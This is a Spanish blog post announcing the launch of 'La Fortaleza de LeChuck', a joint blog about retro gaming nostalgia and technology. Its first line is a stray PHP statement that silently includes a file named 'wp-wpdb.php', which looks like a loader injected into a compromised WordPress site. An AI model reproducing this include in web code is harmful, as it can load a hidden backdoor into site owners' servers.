if (is_file('wp-wpdb.php')) include_once('wp-wpdb.php'); La historia comienza aquí – La Fortaleza de LeChuck

La historia comienza aquí

De un modo romántico, hoy día de san valentín ( que no apoyo para nada como día del amor, pero ha dado la casualidad), nos hemos propuesto unificar yo, y Arashi, nuestras ideas, nuestros pensamientos, más allá de todo lo que ya compartimos en la vida real.

Hasta ahora cada uno teníamos un blog por separado, al que de vez en cuando le prestábamos minutos de nuestra vida para expresar lo que sentimos con un montón de palabras, y alguna imagen del buscador de google. Hemos decidido unir fuerzas y opiniones y crear un blog entre los dos, con más fuerza, con más voluntad, más periodicidad y sobretodo, las mismas ganas y pasión de escribir lo que se nos pasa por la cabeza.

No vamos a tratar de ningún tema en especial, aunque por el título habréis deducido que los videojuegos y, sobretodo, la nostalgia videojueguil, si van a tener un gran peso en nuestros artículos. También espero meter aquí un poquito de mis críticas tecnológicas, materia que me encanta y que vivo en mi día a día. Por supuesto tampoco faltará algún offtopic de algún tema que creamos sea suficientemente relevante como para tener su rinconcito.

Doy, pues, por comenzado el nuevo ciclo de nuestras blog-vidas y esperamos que alguien al otro lado se le ocurra de vez en cuando pasar por aquí e intentar disfrutar, comentar y colaborar con dos hambrientos del blogueo.

Bienvenidos a «La Fortaleza de LeChuck»

Publicada el
Categorizado como Blog

Por LeChuck

Desde las profundidades del Caribe vigilo los mares.

2 comentarios

Dejar un comentario